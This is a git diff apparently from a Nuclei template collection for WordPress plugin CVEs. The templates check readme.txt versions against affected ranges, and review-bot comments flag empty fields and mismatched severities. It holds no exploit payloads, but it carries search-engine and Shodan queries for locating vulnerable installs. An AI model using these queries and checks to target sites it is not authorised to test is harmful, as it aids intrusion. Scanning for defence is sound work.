./poc/other/ip-ipwhois.yaml ./poc/other/ip-loc8-d856c75c4a7648c0d697b0a5cc81d96d.yaml +./poc/other/ip-loc8.yaml ./poc/other/ip-metaboxes-4fa05536816e1ae75e1be41c33811c1b.yaml ./poc/other/ip-metaboxes-e3bf78734b958fe7f3d31b8732e511ff.yaml ./poc/other/ip-metaboxes.yaml @@ -97951,6 +98046,7 @@ ./poc/other/post-duplicator.yaml ./poc/other/post-expirator.yaml ./poc/other/post-from-frontend-c82ef12d6b5c5faa12b5f5ba337b063e.yaml +./poc/other/post-from-frontend.yaml ./poc/other/post-gallery-39b262f792a3a1c198ad39a4f18f8716.yaml ./poc/other/post-gallery-4a111471c3b69e18591d99e8e2c2ccf0.yaml ./poc/other/post-gallery-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -98329,6 +98425,7 @@ ./poc/other/presto-player-3eea4d75664c28dc358ae7e345ae04c6.yaml ./poc/other/presto-player.yaml ./poc/other/pretix-widget-2e623f2a16d7d25a76b4a155be463a14.yaml +./poc/other/pretix-widget.yaml ./poc/other/pretty-link-10cb82ad4b969588ac514969ffb96038.yaml ./poc/other/pretty-link-17fd0e83c56c2d35239cad96f5e19695.yaml ./poc/other/pretty-link-28b2427be030be6512e6825b9e3313d2.yaml 
@@ -98468,6 +98565,7 @@ ./poc/other/product-category-tree-757e3679c00640ae93bcb1882d372e63.yaml ./poc/other/product-category-tree-989cb4bd490429502c57b1c4116d3006.yaml ./poc/other/product-category-tree.yaml +./poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml ./poc/other/product-designer-3f8e1fd53ed8ad42b6005ebef8f40d79.yaml ./poc/other/product-designer-c5bf36635810c0bfffe56b1515830f1c.yaml ./poc/other/product-designer.yaml @@ -99922,6 +100020,7 @@ ./poc/other/restaurant-solutions-checklist-b153f43461ec7d665d82838ed178c6d9.yaml ./poc/other/restaurant-solutions-checklist.yaml ./poc/other/restaurantconnect-reswidget-96627c77b1356a068ee9c31d365f5757.yaml +./poc/other/restaurantconnect-reswidget.yaml ./poc/other/restrict-categories-83c1081ec3f5b4bb37eb4cfd14c464b3.yaml ./poc/other/restrict-categories.yaml ./poc/other/restrict-content-2204b8e66e9a7189953f04581efbb315.yaml @@ -100341,6 +100440,7 @@ ./poc/other/rss-feed-reader-b8c180e9afbfd946ec957b8884660fa5.yaml ./poc/other/rss-feed-reader.yaml ./poc/other/rss-feed-widget-42c825d60cbf2b54b2e3c6a8833dcfa2.yaml +./poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml ./poc/other/rss-feed-widget-c442aab7c95e1be767a882848e68a0ed.yaml ./poc/other/rss-feed-widget.yaml ./poc/other/rss-for-yandex-turbo-25ba50902493a7e536f84e758470fb78.yaml @@ -100662,6 +100762,7 @@ ./poc/other/sb-child-list-0b2143dfb86dd824a1b7aed5ba06f945.yaml ./poc/other/sb-child-list.yaml ./poc/other/sb-random-posts-widget-f10e2da5d4a8325de799114542f5e5f6.yaml +./poc/other/sb-random-posts-widget.yaml ./poc/other/scalable-vector-graphics-svg-7ebcc23c4b2581aa9b5947fe9c79480d.yaml ./poc/other/scalable-vector-graphics-svg.yaml ./poc/other/scarlet-3f3b8c7ed0767e56cd182742c3ecd621.yaml 
@@ -101408,6 +101509,7 @@ ./poc/other/shortcode-ninja-cf0700fbf5aeb160f77c17cbe496451e.yaml ./poc/other/shortcode-ninja.yaml ./poc/other/shortcode-support-for-elementor-templates-86007466d60d35eb3535e395e097d15f.yaml +./poc/other/shortcode-support-for-elementor-templates.yaml ./poc/other/shortcode-to-display-post-and-user-data-79c6104f9ee2600b9a1867ba7b40ef7c.yaml ./poc/other/shortcode-to-display-post-and-user-data-7a1a2f73242ac0686fe520e5ede2edf9.yaml ./poc/other/shortcode-to-display-post-and-user-data-886a9335ebeb7587968d35be6ac6b245.yaml @@ -101644,6 +101746,7 @@ ./poc/other/simple-banner-f668ae3f8428fae3d5ef6f93b05e3154.yaml ./poc/other/simple-banner.yaml ./poc/other/simple-baseball-scoreboard-e529a333b3a6e1902acac19785d96ef8.yaml +./poc/other/simple-baseball-scoreboard.yaml ./poc/other/simple-basic-contact-form-0a3334ba85dfaa09809571ecc4a249ff.yaml ./poc/other/simple-basic-contact-form-4c415b6cc7e8935ac6062a1922941a41.yaml ./poc/other/simple-basic-contact-form-4c6a710b1814cde7e69d69c139947279.yaml @@ -102548,6 +102651,7 @@ ./poc/other/smokesignal-plugin.yaml ./poc/other/smokesignal.yaml ./poc/other/smooth-gallery-replacement-0fd82a28074cfda8fbc1af75d08471c4.yaml +./poc/other/smooth-gallery-replacement.yaml ./poc/other/smooth-page-scroll-updown-buttons-649ee2228cc1d9f00c5e2c7e0e161086.yaml ./poc/other/smooth-page-scroll-updown-buttons-a958888557a04d544d5b6773b0972010.yaml ./poc/other/smooth-page-scroll-updown-buttons.yaml @@ -103524,6 +103628,7 @@ ./poc/other/suitecrm-installer.yaml ./poc/other/suitecrm.yaml ./poc/other/sukebeinyaasi.yaml +./poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml ./poc/other/sully-2ec7f0fa1e4f401a3f8a884fd9854aa9.yaml ./poc/other/sully-36fef0319891e42f249d20dafcbc17a8.yaml ./poc/other/sully-3c7a81376b49d084d5da38f31f5c7ec9.yaml 
@@ -103598,6 +103703,7 @@ ./poc/other/supervpn-panel-10576.yaml ./poc/other/supervpn-panel-10577.yaml ./poc/other/supervpn-panel.yaml +./poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml ./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml ./poc/other/support-genix-lite.yaml ./poc/other/support-incident-tracker.yaml @@ -103965,6 +104071,7 @@ ./poc/other/tajer-897b9a6ef99ebb108706f45fd054c941.yaml ./poc/other/tajer.yaml ./poc/other/talkback-secure-linkback-protocol-34b64e53b1af5d56803a233d1fc15efb.yaml +./poc/other/talkback-secure-linkback-protocol.yaml ./poc/other/tallykit.yaml ./poc/other/tamronos iptv系统.yaml ./poc/other/tamronos-user-creation.yaml @@ -107821,6 +107928,7 @@ ./poc/other/woo-easy-duplicate-product-77102a310cbbfd0129222bc051ae381d.yaml ./poc/other/woo-easy-duplicate-product-d3f0c12550da352a4f10bcc722ae4373.yaml ./poc/other/woo-easy-duplicate-product.yaml +./poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml ./poc/other/woo-edit-templates-f07f921d3ab929108946de3552c80163.yaml ./poc/other/woo-edit-templates.yaml ./poc/other/woo-email-control-5372aede0855022f991604fe288cd8bc.yaml @@ -108044,6 +108152,7 @@ ./poc/other/woo-seo-addon.yaml ./poc/other/woo-shipping-display-mode-2d3075ac9da71d5c985dc0ed024b9ec4.yaml ./poc/other/woo-shipping-display-mode.yaml +./poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml ./poc/other/woo-shipping-dpd-baltic-5c365a05388cfbae523bd5865cabbaba.yaml ./poc/other/woo-shipping-dpd-baltic-76df9e8ddfe10df6d9b34458a945079a.yaml ./poc/other/woo-shipping-dpd-baltic.yaml 
@@ -112555,6 +112664,7 @@ ./poc/remote_code_execution/woo-ecommerce-tracking-for-google-and-facebook.yaml ./poc/remote_code_execution/woo-parcel-pro-3995439370cffe55d99117aedb670a79.yaml ./poc/remote_code_execution/woo-parcel-pro-3f72e246b9fdb2cf96f9586da902cfb6.yaml +./poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml ./poc/remote_code_execution/woo-parcel-pro-fd91eb3145bab903f7fb280f1c730688.yaml ./poc/remote_code_execution/woo-parcel-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woo-parcel-pro-plugin.yaml @@ -114017,6 +114127,7 @@ ./poc/search/acf-better-search-92227a17c1f36e5836a835a2974c3c9c.yaml ./poc/search/acf-better-search.yaml ./poc/search/acf-images-search-and-insert-e47a6204cdbedbb402c7f2651a014300.yaml +./poc/search/acf-images-search-and-insert.yaml ./poc/search/add-search-to-menu-233e0e7dddff66b680fc0229fdeedb16.yaml ./poc/search/add-search-to-menu-2c53ca508bd85217f4d77d498bac7c2b.yaml ./poc/search/add-search-to-menu-340412de430ddac89cc6028eb15c91fd.yaml @@ -115550,6 +115661,7 @@ ./poc/social/social-share-buttons-by-supsystic-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/social-share-buttons-by-supsystic-plugin.yaml ./poc/social/social-share-buttons-by-supsystic.yaml +./poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml ./poc/social/social-sharing-toolkit-8b0db7156873702bdc12cab20cd09570.yaml ./poc/social/social-sharing-toolkit-8b4ed2648dec5a06344145d95bd1776e.yaml ./poc/social/social-sharing-toolkit-ffc7184d9598acd2b7bdc8e43212020e.yaml 
@@ -117209,6 +117321,7 @@ ./poc/sql/CVE-2024-0954-760e16e786dbe11046e07b3f65eb13db.yaml ./poc/sql/CVE-2024-0956-dec8fc1767837ea369e30ca1ecdb9c30.yaml ./poc/sql/CVE-2024-0972-d643db18054b1dd86be768803ada8c1e.yaml +./poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml ./poc/sql/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml ./poc/sql/CVE-2024-1047-68db58e698228b42f923e1452fb395bc.yaml ./poc/sql/CVE-2024-1049-0e66fa189b7475aa8bef5ee2db21f9f7.yaml @@ -117844,6 +117957,7 @@ ./poc/sql/CVE-2024-8675-2579ae41909742bfecbbc60a59db1710.yaml ./poc/sql/CVE-2024-8720-de75ddb341cf2c3da9270fff1b0efdb8.yaml ./poc/sql/CVE-2024-8727-ae87d4f5a52dd5aba777d7e1dc1848db.yaml +./poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml ./poc/sql/CVE-2024-8795-3332712efb7806b1aa3560db5575e663.yaml ./poc/sql/CVE-2024-8800-24174edddc1bdbea66c89ab990604404.yaml ./poc/sql/CVE-2024-8802-e9f6f582db2e920a7bf95437ee8218f9.yaml @@ -117861,6 +117975,7 @@ ./poc/sql/CVE-2024-9222-6d3211dbe3c26f975c3e1ae606af3b47.yaml ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml +./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml ./poc/sql/CVE-2024-9521-4587dbff6356b28863ebeee1f7d9133f.yaml ./poc/sql/CVE-2024-9529-db7341b5bf720c2f45daca0a630903ae.yaml ./poc/sql/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml @@ -122278,6 +122393,7 @@ ./poc/sql/woo-orders-tracking-599c2c8548a1c37ed2db250ad779415b.yaml ./poc/sql/woo-parcel-pro-3995439370cffe55d99117aedb670a79.yaml ./poc/sql/woo-parcel-pro-3f72e246b9fdb2cf96f9586da902cfb6.yaml +./poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml ./poc/sql/woo-paylate-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/woo-pdf-invoice-builder-504e502e118b95434dbdceb7501ab1fe.yaml ./poc/sql/woo-pensopay-09982b78f0903db47082c498edd9651a.yaml 
@@ -126360,6 +126476,7 @@ ./poc/web/synology-webstation.yaml ./poc/web/tasmota-config-webui.yaml ./poc/web/telecash-ricaricaweb-5a6ad4dd0471307888a0107a11a5c1b7.yaml +./poc/web/telecash-ricaricaweb.yaml ./poc/web/tenda-web-master.yaml ./poc/web/tenweb-speed-optimizer-43a480a0284beb0ba94273bcb7d7d4fb.yaml ./poc/web/tenweb-speed-optimizer-488c74b6c954e7bcfe6f3ba9396145d7.yaml @@ -127465,6 +127582,7 @@ ./poc/wordpress/dynamic-font-replacement-4wp.yaml ./poc/wordpress/easy-google-analytics-for-wordpress-06ea0706f943f940d87398ff6563b526.yaml ./poc/wordpress/easy-google-analytics-for-wordpress.yaml +./poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml ./poc/wordpress/easy-social-share-buttons-for-wordpress-c87965eee3695d8be4e6a23762ab2103.yaml ./poc/wordpress/easy-social-share-buttons-for-wordpress-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/easy-social-share-buttons-for-wordpress-e57e5e233dc34a562c51780afac2f8cc.yaml @@ -128119,6 +128237,7 @@ ./poc/wordpress/mappress-google-maps-for-wordpress.yaml ./poc/wordpress/mapster-wp-maps-461ea30f42ad696e5f4caf7ead9ea09c.yaml ./poc/wordpress/mapster-wp-maps.yaml +./poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml ./poc/wordpress/mastercurrency-wp-3f25e87948bf1b2c81b3ba4c73f155ea.yaml ./poc/wordpress/mastercurrency-wp.yaml ./poc/wordpress/memberful-wp-fbab98bc9cf332dc0c1f693a01cfd26c.yaml @@ -132857,6 +132976,7 @@ ./poc/wordpress/wp-security-scan.yaml ./poc/wordpress/wp-sendfox-bdf4a98ac2cb1ef89f4c3b97512ede7f.yaml ./poc/wordpress/wp-sendfox.yaml +./poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml ./poc/wordpress/wp-sendgrid-mailer-ff9d6ca33f3c466181325c5fa6a03923.yaml ./poc/wordpress/wp-sendgrid-mailer.yaml ./poc/wordpress/wp-sentry-c2ab687b9bdad07c3c9b84f3521d750c.yaml diff --git a/poc/auth/publishpress-authors.yaml b/poc/auth/publishpress-authors.yaml new file mode 100644 index 0000000000..c0464409f8 --- /dev/null 
+++ b/poc/auth/publishpress-authors.yaml @@ -0,0 +1,59 @@ +id: publishpress-authors + +info: + name: > + Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors <= 4.7.1 - Insecure Direct Object Reference to Authenticated (Author+) Arbitrary User Email Update and Account Takeover + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0506137-82e3-4988-9b23-370465a866c0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/publishpress-authors/" + google-query: inurl:"/wp-content/plugins/publishpress-authors/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,publishpress-authors,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/publishpress-authors/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "publishpress-authors" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.7.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml b/poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml new file mode 100644 index 0000000000..ba06bdbb7f --- /dev/null +++ b/poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml 
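Review bot: The `info` block ships with `description`, `cvss-metrics`, `cvss-score` and `cve-id` left empty and with `shodan-query: 'vuln:'` carrying no identifier, so a hit from this template gives the analyst no advisory context to triage on. Fill these from the Wordfence entry already listed under `reference`, or drop the empty keys and the `shodan-query` line. `severity: low` also sits oddly beside a name that ends in "Account Takeover". With no score on the page the correct value cannot be confirmed here, so it should be checked against the advisory before merge.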
@@ -0,0 +1,59 @@ +id: CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a + +info: + name: > + Flat UI Button <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via flatbtn Shortcode + author: topscoder + severity: low + description: > + The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10014 + metadata: + fofa-query: "wp-content/plugins/flat-ui-button/" + google-query: inurl:"/wp-content/plugins/flat-ui-button/" + shodan-query: 'vuln:CVE-2024-10014' + tags: cve,wordpress,wp-plugin,flat-ui-button,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flat-ui-button/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flat-ui-button" + part: body + + - type: dsl + dsl: + - compare_versions(version, '1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml b/poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml new file mode 100644 index 0000000000..dd575da452 --- /dev/null 
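Review bot: The DSL matcher is `compare_versions(version, '1.0')` with no operator, while the template name says `<= 1.0` and the other version-check templates visible in this diff all pass a `<=` constraint. A bare version is presumably treated as an exact match, so a readme reporting an earlier release would not be flagged. If the affected range is as the name states, the line should read `- compare_versions(version, '<= 1.0')`.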
+++ b/poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10040-ee8183e3617c63ac904e5e710044f265 + +info: + name: > + Infinite-Scroll <= 2.6.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The Infinite-Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.2. This is due to missing or incorrect nonce validation on the process_ajax_edit and process_ajax_delete function. This makes it possible for unauthenticated attackers to make changes to plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4045575a-35f0-46e5-afb7-93eee9be3a97?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-10040 + metadata: + fofa-query: "wp-content/plugins/infinite-scroll/" + google-query: inurl:"/wp-content/plugins/infinite-scroll/" + shodan-query: 'vuln:CVE-2024-10040' + tags: cve,wordpress,wp-plugin,infinite-scroll,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infinite-scroll/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infinite-scroll" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.2') \ No newline at end of file 
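Review bot: The match rests entirely on the `Stable tag` line of a publicly served `readme.txt`, which describes release metadata and does not exercise the vulnerable code path. A readme whose stable tag is `trunk` or otherwise non-numeric fails the `([0-9.]+)` extractor and the target is silently skipped, and a blocked or stale readme has the same effect, so the absence of a hit is not evidence of a patched install. A comment above `extractors:` such as `# version-only check from readme.txt; confirm the installed plugin version before triage` would make that explicit. The same applies to the other readme-based templates in this diff (publishpress-authors and the CVE-2024-100xx and CVE-2024-480xx files).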
diff --git a/poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml b/poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml new file mode 100644 index 0000000000..76c407c39c --- /dev/null +++ b/poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92 + +info: + name: > + Edit WooCommerce Templates <= 1.1.2 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + The Edit WooCommerce Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10049 + metadata: + fofa-query: "wp-content/plugins/woo-edit-templates/" + google-query: inurl:"/wp-content/plugins/woo-edit-templates/" + shodan-query: 'vuln:CVE-2024-10049' + tags: cve,wordpress,wp-plugin,woo-edit-templates,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-edit-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-edit-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml b/poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml new file mode 100644 index 0000000000..a0b9248e03 --- /dev/null 
+++ b/poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29 + +info: + name: > + Click to Chat – WP Support All-in-One Floating Widget <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wpsaio_snapchat Shortcode + author: topscoder + severity: low + description: > + The Click to Chat – WP Support All-in-One Floating Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsaio_snapchat shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c13600-0791-4ade-9c28-f43f164aedae?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10055 + metadata: + fofa-query: "wp-content/plugins/support-chat/" + google-query: inurl:"/wp-content/plugins/support-chat/" + shodan-query: 'vuln:CVE-2024-10055' + tags: cve,wordpress,wp-plugin,support-chat,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/support-chat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "support-chat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file 
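Review bot: `severity: low` disagrees with the `cvss-score: 6.4` recorded three lines below it, which is a medium rating under CVSS 3.1. The label appears to follow the required privilege level rather than the score, and the same mismatch shows in CVE-2024-10014, 10057, 10080, 48022 and 48025 (6.4), 48020 (6.5), 10078 (7.3), and 10079 and 48027 (8.8, the latter an RCE). Scans filtered by severity would drop these findings, so the field and the trailing tag should track the score: `severity: medium` with `tags: ...,medium` here, and `severity: high` for the 7.3 and 8.8 entries.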
diff --git a/poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml b/poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml new file mode 100644 index 0000000000..e20b351ba8 --- /dev/null +++ b/poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3 + +info: + name: > + RSS Feed Widget <= 2.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via rfw-youtube-videos Shortcode + author: topscoder + severity: low + description: > + The RSS Feed Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rfw-youtube-videos shortcode in all versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10057 + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:CVE-2024-10057' + tags: cve,wordpress,wp-plugin,rss-feed-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml b/poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml new file mode 100644 index 0000000000..002cb7c8d1 --- /dev/null +++ b/poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10078-ac3355172629b828c0c05e8735d48816 + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions + author: topscoder + severity: low + description: > + The WP Easy Post Types plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 1.4.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options and posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-10078 + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:CVE-2024-10078' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml b/poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml new file mode 100644 index 0000000000..6c56e809b2 --- /dev/null +++ b/poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10079-79020560113c9d55758318e5701b73cf + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) PHP Object Injection + author: topscoder + severity: low + description: > + The WP Easy Post Types plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.4 via deserialization of untrusted input from the 'text' parameter in the 'ajax_import_content' function. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d038f1a2-4755-417f-965d-508b57c05738?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10079 + 